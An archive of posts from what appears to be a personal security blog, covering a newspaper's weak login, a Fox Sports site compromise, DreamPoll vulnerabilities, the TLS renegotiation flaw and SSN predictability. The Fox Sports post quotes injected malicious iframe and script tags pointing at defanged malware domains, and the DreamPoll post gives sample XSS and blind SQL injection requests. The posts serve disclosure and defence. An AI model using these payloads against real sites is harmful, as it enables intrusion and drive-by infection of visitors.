NewsandObserver.com Weak Authentication

February 16, 2010 in Hacking, Vulnerabilities | 5 comments

Recently I decided that I would no longer maintain my subscription to the local newspaper, The News and Observer.  Like many people I find that I get most of my news online these days and didn’t want to continue paying for something I didn’t use.  I decided to look at their web site to see if I could cancel my subscription online.  This is where I discovered that the newsandobserver.com uses a terrible authentication mechanism that can lead to the disclosure of personal information and unauthorized changes to paper delivery and other subscription options.

The crux of the problem is that the web site relies on publicly available information to authenticate subscribers.  Below is a screenshot of the subscriber login screen.

As you can see, all that is required to login to a subscriber account is a phone number and house number.  Both of these pieces of information are easily obtained online for most people.  After authentication, you have access to the subscriber’s account where you can gain additional information about the them.  The most important information that you can get access to is the subscriber’s email address.  This would be useful to scammers who could setup a fake site that resembles the real newsandobserver.com, send the subscriber an email telling them that they need to update their account information, and then obtain their credit card or other financial account data.  Below is a screenshot of my account home page.

Another thing that you can do within the subscriber section is manipulate delivery options.  For example, you can put stops on delivery or extend your subscription.  This would allow an unauthorized person to put a hold on someone else’s paper delivery or even change the length of their subscription, both of which could have a financial impact on the subscriber.  Below is a screenshot showing the ability to change these options.

Lastly, subscribers are able to change their personal information such as email address and phone number.  There is also a check-box to disable email notification of account changes.  A scammer could use this option to prevent notifications from being sent to the subscriber after he made changes to the account.  By updating the email address and phone number to one of his choosing, he may even be able to use social engineering to obtain credit card information from an N&O customer service representative.  Below is a screenshot of the page that allows a subscriber to change personal information.

Such a weak authentication mechanism is inexcusable for the second largest newspaper in the state of North Carolina.  With over 750,000 print and online readers, there are many opportunities for scammers to use this weakness to obtain subscribers’ personally identifiable information and potentially additional financial information.  It would not be difficult to automate a process for gathering phone numbers and house numbers for prominent people in North Carolina, many of whom are likely to subscribe to the News and Observer, attempt to login as these individuals, and obtain their email addresses.  With such a list in hand, it would be possible to send them fake emails appearing to be from the N&O that could trick them into divulging their credit card numbers.

I have contacted the NewsandObserver.com to report this vulnerability to them.  Remediation is not difficult.  There are many types of authentication mechanisms that work well and the OWASP has a great site dedicated to this topic.  I hope that they take advantage of it to correct this issue.

Mac Users Beware

January 18, 2010 in Browser security, Vulnerabilities, malware | No comments

apple-chains

The conversation usually goes something like this:

Me:  “Hey, have you heard about that new phishing attack targeting Bank of America customers?”

Mac User:  “Oh, I’m not worried about that.  I use a Mac.”

Me: “Well you know, just because you use a Mac doesn’t mean you are safe from an attack.”

Mac User: “Ha.  Everyone knows that Macs are waaaay more secure than Windows systems.”

If I had a nickel for every time I have heard a Mac user make some type of statement to this effect, I would not have to buy any more lottery tickets.  There is a widespread belief that Mac OS X is inherently more secure than Windows and that by using a Mac, one is protected from all threats.  Unfortunately, not only is this not true, but it is dangerous as it leads people to not take appropriate precautions to protect their computers and information.

Let’s start with some basic facts.  I performed a search of the NIST national vulnerability database and found the below data regarding Windows and OS X vulnerabilities:

Year # of OS X Vulns # of Vista Vulns
2007 152 61
2008 117 61
2009 101 106

These numbers represent the total number of vulnerabilities published for each of the last 3 years for Mac OS X (all versions) and Microsoft Windows Vista (all versions).  It is clear that OS X has had more total vulnerabilities in the last 3 years than Vista has.  These vulnerabilities provide potential avenues of attack for hackers which can lead to system compromise and data disclosure.

But that is only the tip of the iceberg.  Phishing scams, trojans, drive by downloads and other threats don’t depend on any vulnerability in software in order to be successful.  The weakness they exploit is in the user of the computer.  It doesn’t matter whether you use a Mac, a PC, a Next, or a Cray.  If you fall victim to one of these types of attacks that relies on social engineering to get users to divulge their credentials or install malware, using a Mac doesn’t offer you any protection at all.

Given the fact that Mac OS X has plenty of vulnerabilities, it might seem surprising that there is not more malware in the wild that exploits these weaknesses.  I believe the answer to this riddle can be found in the relative percentage of Windows to Mac users.  Most studies have found that Apple has between 7% – 12% market penetration, while Microsoft maintains nearly 85% market share.  If you are a hacker hoping to exploit vulnerabilities, it clearly makes more sense to devote your time and resources to the Windows platform since your odds of success will be much higher.  However, as the percentage of Mac OS X users grows, the number of exploits that target OS X will also grow.  So Mac users take note.  Do not be lulled into a false sense of security.  Be sure to follow best practices for protecting your computer and your data in order to minimize the risk of a successful attack.

Fox Sports Compromised… Again

December 30, 2009 in Hacking, Web | No comments

In October of 2009 the Fox Sports web site was found to have been compromised with an iframe that redirected visitors to a site hosting malicious content.  The affected URL was hxxp://msn.foxsports.com/fantasy/baseball/hotstreak/external and an example of the injected code is below:

<iframe src=”hxxp://thingre.com/in.php” width=”1″ height=”1″ style=”visibility:hidden;position:absolute”></iframe>

Anyone who accessed this site while the malicious code was active could potentially have had their computer infected with malware.  Fox Sports administrators eventually removed the iframe, but today the same page was infected again.  This time the below two script tags were injected:

<script src=hxxp://akcworld.com/genco/fusion-request-a-password.php ></script><body topmargin=”0″ leftmargin=”0″ marginheight=”0″ marginwidth=”0″>

and

<script src=’hxxp://nt002.cn/E/J.JS’></script>

These same two scripts were also used in the October Fox Sports web site compromise incident.  The akcworld.com  and nt002.cn domains are widely known to host malicious content and are frequently used as part of the Gumblar campaign.  At approximately 9:50pm I checked the Fox Sports web site to verify if the page was still infected.  It was not.  I then checked the page information and saw that it had been modified at 9:39pm EST, just 10 minutes before I checked the site.

foxsports

The Fox Sports administrators moved very quickly this time to rectify the site compared to the October incident which nearly two weeks to address.  However, this situation obviously begs the question how the Fox Sports web site keeps being compromised.  I can think of several possibilities that would explain how this could occur:  1)  The hackers installed a backdoor that they continue to use for access 2) The hackers continue to use compromised credentials to the web site 3) A vulnerability exists in the web site that has not been remediated 4) Fox Sports administrators restored an older version of the page that included the malicious code from the October hack.  We won’t likely learn the root cause of this compromise any time soon, but it is certain that unless Fox Sports takes preventative action, it will probably occur again.

WCPSS Student SSN Disclosure

December 13, 2009 in Data Loss | No comments

Recently the Wake County Public School System, in Raleigh North Carolina, sent out about 15,000 post cards to the parents of students.  These post cards contained information for parents on how to indicate their intentions for school attendance in the next school year.  And about one third of these post cards contained something else…the social security number of the student.  My children attend school in Wake County and also received one of these post cards.  Luckily, we were in the two thirds that did not have the social security number displayed on the post card.  Below is a photo of an actual card that was sent out.  The number circled in red was an actual social security number on those cards that were affected by the leak.

DSCN0630new

As troubling as this mistake was, what is even more troubling is the lack of recourse for affected students and parents.  North Carolina, like most states, has a data breach notification law which I have written about previously.  This law specifically prohibits sending post cards that contain personal information such as social security numbers.  See the relevant section of the law below:

Except as provided in subsections (c) and (d) of this section, no agency of the State or its political subdivisions, or any agent or employee of a government agency, shall do any of the following:

(9) Print an individual’s social security number on any materials that are mailed to the individual, unless state or federal law required that the social security number be on the document to be mailed. A social security number that is permitted to be mailed under this subdivision may not be printed, in whole or in part, on a postcard or other mailer not requiring an envelope, or visible on the envelope or without the envelope having been opened.

Like most state breach notification laws, the North Carolina law requires incidents such as this to be reported and for those affected to be contacted.  To their credit, the Wake County Public School System did disclose the error and has agreed to provide one year of free credit monitoring for affected families.  But they are not required to do so.  According to the statute, “No private right of action may be brought by an individual for a violation of this section unless such individual is injured as a result of the violation.”   Proving injury is next to impossible as there usually is no way to demonstrate the source of identity theft or credit fraud.  Moreover, these SSNs could be stored for years before being used fraudulently.  Affected students will need to monitor their credit closely for many years to come.  And if they do end up being victimized by the this egregious mistake, they have little legal recourse.

North Carolina’s breach notification law is similar to most states in that it requires businesses and other organizations to disclose breaches of personally identifiable information (PII).  And as with most other state laws of this type, penalties for violation are not very strong.  North Carolina’s law is one of the few that actually does allow an individual to sue in the event that injury is caused by the breach.  In actuality though, it is highly unlikely that any business will have to pay for injuries resulting from disclosure of PII.  Congress is currently debating a federal breach notification law that would apply to all U.S. business.  This is a step in the right direction and guarantees that any U.S. citizen whose PII has been disclosed will be notified.  But penalties for violation are still weak and until businesses are faced with financial penalties, disclosures will continue to be a problem.

OpenX 2.8.1 Vulnerability

November 24, 2009 in Vulnerabilities | No comments

The following information was recently posted to a well known information security mailing list.

OpenX adserver version 2.8.1 and lower is vulnerable to remote code execution. To be exploited, this vulnerability requires banner / file upload permissions, such as granted to the ‘advertiser’ and ‘administrator’ roles.

This vulnerability is caused by the (insecure) file upload mechanism of affected OpenX versions. These would check magic bytes of an uploaded file to determine its MIME type, and erroneously assume this information to be reliable. Additionally, while the file name of uploaded files is changed, the file extension is not.

As such, it is possible to upload image files with embedded PHP code and .php file extension. Unless PHP script execution is explicitly prevented for the file upload location (which has not been documented in the OpenX manual so far and it is not the result of a default installation), the PHP code will execute as soon as HTTP access to the file location will cause it to be executed by the web server.

To clarify, an attacker exploiting this security issue does require prior access to OpenX, i.e. exploitation is only possible after successful authentication. On the other hand, advertiser access is a rather low permission level and should not allow for system access.

If these bugs were not hidden from OpenX’ bug tracker, you could read up more about issue X-5747 here: https://developer.openx.org/jira/browse/OX/fixforversion/10910

OpenX 2.8.2 has already been released in October to fix this issue and can be downloaded from http://www.openx.org/ad-server/download

Credit goes to Moritz Naumann for disclosing this vulnerability.

Putting the TLS Vulnerability Into Perspective

November 9, 2009 in Cryptography, Vulnerabilities, Web | 1 comment

Introduction

Late last week it was disclosed by security researchers Marsh Ray and Steve Dispensa that a design flaw in TLS (the IETF implementation of SSL) could allow an attacker to successfully inject data in an encrypted session using a man-in-the-middle (MITM) attack.   The primary problem occurs during the renegotiation of the TLS channel when client certificates are employed.  Their paper documents the vulnerabilities in the TLS protocol as well as how the vulnerabilities could be exploited to violate the integrity of the data stream between a web client and server.  Even though the encrypted data cannot be read by the attacker, it is possible to inject arbitrary data into an authenticated session and it will be treated by the server as if it came from the client.  I will discuss the risks associated with this important discovery and outline some potential attack scenarios.

Putting the Risk Into Perspective

  • As mentioned previously, this vulnerability primarily affects sessions in which client certs are in use.  The vast majority of secured TLS sessions today do not involve client certs which limits the impact of this vulnerability.  For example, if you are shopping online or connecting to your bank over the Internet, it is almost certainly the case that a client cert is not in use.  Where client certs are sometimes used is in enterprise applications such as external access to corporate email.  Some companies require the use of client certs in this scenario.  Also, TLS sessions between systems used as part of a web application (e.g. SOAP calls) sometimes utilize client certs for greater security.  However, for most users client side certs are a non-issue which limits the scope of this vulnerability.
  • Another limiting factor of this vulnerability is the fact that it can only be exploited via a MITM attack.  MITM attacks are fairly difficult to successfully execute as it requires the interception of the network traffic between the client and the server.  While this is not impossible, it certainly would require some additional work.  In many cases, the hacking that would be necessary just to pull of the MITM attack would lead to greater potential rewards than the hacking of the TLS connection.  Some examples of MITM techniques include:
  1. Compromising the network of either the client or the server (e.g. ARP poisoning)
  2. Manipulating the DNS server of the client
  3. Taking advantage of an unsecured WIFI network connected to either the client or the server
  4. Using social engineering to compromise either the client or the server
  5. Compromising a proxy server used by either the client or the server
  • The results of an attack against this vulnerability do not allow the attacker to see any encrypted data sent by the client or the server.  It could allow an attacker to inject commands into the session which the server would believe came from the client and would execute.  However, the attacker would not be able to see the results which limits the impact of this vulnerability.  This situation clearly violates the integrity of the session, but the amount of damage that can be done is limited.
  • This vulnerability does affect more than just HTTP.  This is the most common protocol to use TLS, but others do as well (e.g. IMAP).  The shear scope of applications and protocols that rely on it warrants a fix to ensure that developers and end users can be confident in the behavior and security of their applications.

Summary

The vulnerability in the TLS protocol disclosed on November 4, 2009 is not likely to lead to a great deal of exploitation.  The primary reasons are the difficulty required to successfully launch an attack and the limited nature of the vulnerability and the how it can be exploited.  Most attacks today are financially motivated and are conducted by groups that understand how to perform a cost benefit analysis.  I suspect that they will look at this vulnerability and decide that there are easier ways to exploit systems for monetary gain and it will not be worth their time to devote resources to develop exploits for this one.  The pay off is simply not high enough.  In sum, I believe the risk to most individuals and organizations is fairly low.  Fixes are already being rolled out, but given the extent to which TLS is used today, it will likely be many years before all applications and devices have been remediated.  Even still, I will be surprised if we read about any significant compromises in the future that are attributable to this vulnerability.

Sources for Additional Reading

http://www.educatedguesswork.org/2009/11/understanding_the_tls_renegoti.html

http://www.securityfocus.com/bid/36935/info

http://www.ietf.org/mail-archive/web/tls/current/msg03928.html

http://www.links.org/?p=780

DreamPoll 3.1 Vulnerabilities

October 7, 2009 in Research, Vulnerabilities, Web | No comments

hack

During a recent security audit of the DreamPoll 3.1 software by Dreamlevels, I discovered a number of XSS and SQL Injection vulnerabilities in the application.  These vulnerabilities could be exploited to make unauthorized changes to a web site or compromise a client accessing a site that utilizes the application.  Details of the vulnerabilities are as follows:

XSS
————————-
File: index.php
Variable: recordsPerPage
Example: GET /index.php?action=login&sortField=poll_default&sortDesc=1&recordsPerPage=1>”><ScRiPt%20%0d%0a>alert(911)%3B</ScRiPt>

Blind SQL/Xpath Injection
————————-
File: index.php
Variable: sortField
Example: GET /index.php?action=loginsortField=poll_default+and+31337-31337=0&sortDesc=1&recordsPerPage=20

Blind SQL Injection (Timing)
————————-

File: index.php
Variables: sortField, sortDesc, pageNumber
Example: GET /index.php?action=loginsortField=poll_default+and+sleep(3)%23&sortDesc=1&recordsPerPage=20

While not specifically tested, it is likely these vulnerabilities exist in earlier versions of this application as well.  The vendor was notified on 09/28/2009 and a fix was released the same day.  If you are a current user of this software, contact the vendor for the available fix.

State of Internet Security Report

September 19, 2009 in General Information Security, Web

Websense recently released their report on the State of Internet Security for the first half of 2009.  They have some very interesting findings which I have summarized below.

  • In the first half of 2009, 77 percent of Web sites with malicious code were legitimate sites that have been compromised. This high percentage was maintained over the past six months in part due to widespread attacks including Gumblar, Beladen and Nine Ball which aimed at compromising trusted Web properties with massive injection campaigns.
  • Web 2.0 sites allowing user-generated content are a top target for cybercriminals and spammers. Websense Security Labs found that 95 percent of comments to blogs, chat rooms and message boards are spam or malicious.
  • The “Dirty” Web is getting dirtier: 69 percent of all Web pages with content classified as objectionable (e.g. Sex, Adult Content, Gambling, Drugs) also had at least one malicious link. This is becoming even more pervasive, as 78 percent of new Web pages discovered in the first half of 2009 with objectionable content had at least one malicious link.
  • Websense Security Labs found that 37 percent of malicious Web attacks included data-stealing code, demonstrating that attackers are after essential information and data.
  • The Web continues to be the most popular vector for data-stealing attacks. In the second half of 2008 the Websense Security Labs found that 57 percent of data-stealing attacks are conducted over the Web.
  • The convergence of blended Web and email threats continues to increase. Websense Security Labs reports that 85.6 percent of all unwanted emails in circulation during the first half of 2009 contained links to spam sites or malicious Web sites.
  • In June alone, the total number of emails detected as containing viruses increased 600 percent over the previous month.

This information confirms that the Web is a dangerous place and becoming more so.  The reason is simple… money.  Criminals have figured out that the benefit from online crime is high and the cost is low.  Moreover, the chances of getting caught are slim.  Compare the crime of identity theft or credit card fraud committed via the Internet with a physical crime such as a bank robbery.  The cost of committing a crime on the Internet is low.  One can obtain ready made software on the Internet that will help you obtain credit card and other personal information with which it is possible to commit fraud.  The risk associated with this crime is very low compared to the expected payoff.   However, robbing a bank has very high costs and risks.  One could get shot or get caught and sent to prison.  And the likely payoff isn’t that great either.  The average amount of money stolen during a bank robbery is less than $5000.  This isn’t much compared with the risks.

Internet crime is a huge business.  To protect yourself, follow best practices for using the Web safely.  Even legitimate and well known web sites can get compromised and be used to commit fraud against you.  And don’t think because you use a Mac that you are immune to these attacks.  You aren’t.  More on that in a future article.

Comments on Patch Tuesday

September 8, 2009 in Patch Management, Vulnerabilities

patchtuesday

The second Tuesday of the month is always a busy day for IT and security pros.  That, of course, is the day Microsoft releases their regular security updates.  And this month’s list of advisories reminds me how far we have to go before we get an upper hand on the bad guys who exploit vulnerabilities for a living.  Microsoft, like so many other software vendors, continues to release vulnerable software and we continue to apply patches to fix those vulnerabilities.  All the while, systems are exposed and often get compromised due to this game of reactive patch management.

Microsoft released 5 security advisories today to address 8 vulnerabilities:

  • MS09-045 – addresses a vulnerability in Jscript (KB 971961)
  • MS09-046 – addresses a vulnerability in Microsoft Windows (KB 956844)
  • MS09-047 – addresses a vulnerability in Microsoft Windows (KB 973812)
  • MS09-048 – addresses a vulnerability in Microsoft Windows (KB 967723)
  • MS09-049 – addresses a vulnerability in Microsoft Windows (KB 970710)

The first three patches address vulnerabilities that allow a malicious web site to compromise an unpatched machine simply by browsing the web site.  These drive-by exploits are undoubtedly already setup on rogue web servers, compromising vulnerable systems even as I write this.  Microsoft rated MS09-045 and MS09-047 as critical and MS09-046 as important.

The other two, MS09-048 and MS09-049, are more interesting and potentially more problematic.  Both of these vulnerabilities are rated as important by Microsoft, but I would not be surprised if exploits for these two end up doing more damage than the others.  The reason for this is that both of these patches address vulnerabilities in the network stack and do not require any intervention by the end user for exploitation.  This makes them good candidates for exploitation via a worm which increases the criticality of these advisories.  Microsoft believes these vulnerabilities are most likely to be exploited via a denial of service attack as it is difficult to reliably achieve remote code execution.  But denial of service attacks can be very damaging and it is not inconceivable that someone could write a exploit that can smash the stack, resulting in remote code execution.

Microsoft is not alone in releasing regular security patches and expecting us, the end users, to manage the process of performing the updates.  Apple, Adobe, Red Hat, Sun and every other software vendor does the same thing.  While I understand that software development is a complex endeavor, vendors must get better at implementing security testing and vulnerability analysis into their software development life cycle.  But until they do, keep applying those patches.

The Implications of Predictable SSNs

August 17, 2009 in Social Networking

social_security_626_article

Two researchers from Carnegie Mellon University recently released a study showing that social security numbers (SSNs) can be predicted with a fairly high degree of accuracy by knowing just a few bits of personal information.  For example, with knowledge of a person’s birth date and town of birth, they were able to predict the SSN of 8.5% of people born between 1989 an 2003 with fewer than 1000 attempts.  The reason that this works is that SSNs are not randomly assigned, but instead are based on a complex yet regular (and thus predictable) pattern.

This research is of more than just an academic interest.  It has real implications for identity fraud and how to protect yourself from becoming a victim.  So how could a malicious person or organization could use this research to commit identity theft?  Since all one needs to know to be able to predict someone’s SSN is date of birth and hometown, the best place to begin is on a social networking site such as Facebook or Myspace.  Many people freely provide this information not only to their “friends”, but often to everyone.  It is easy to find out when and where just about anyone was born on these types of sites.  And even if you are careful about sharing this information only with friends, many people accept friendship invitations from just about anyone.  If I were targeting someone in particular who’s identity I wanted to steal, I would simply try to befriend some of their contacts before sending them a friend request.  This would lend credibility to the friendship request and make them more likely to accept it.  With a little social engineering, it would not be very difficult to determine the necessary personal information for just about anyone.

The next step would be to use the methods described in the research to predict a set of SSNs for the targeted victims.  Once a list of probable SSNs has been generated, it is possible to use online resources, such as instant online credit approval services or the Social Security Administration verification database, to verify correct SSNs.   Once someone has the name, birth date, hometown and SSN of someone, it is then very easy to steal their identity or obtain credit in their name.  All of this could easily be automated to increase the speed and efficiency of obtaining SSNs, making this a legitimate threat to the safety of personal information.  To protect yourself, be very careful about how much information you share on social networking sites and only accept known people into your online networks.

Get Adobe Flash playerPlugin by wpburn.com wordpress themes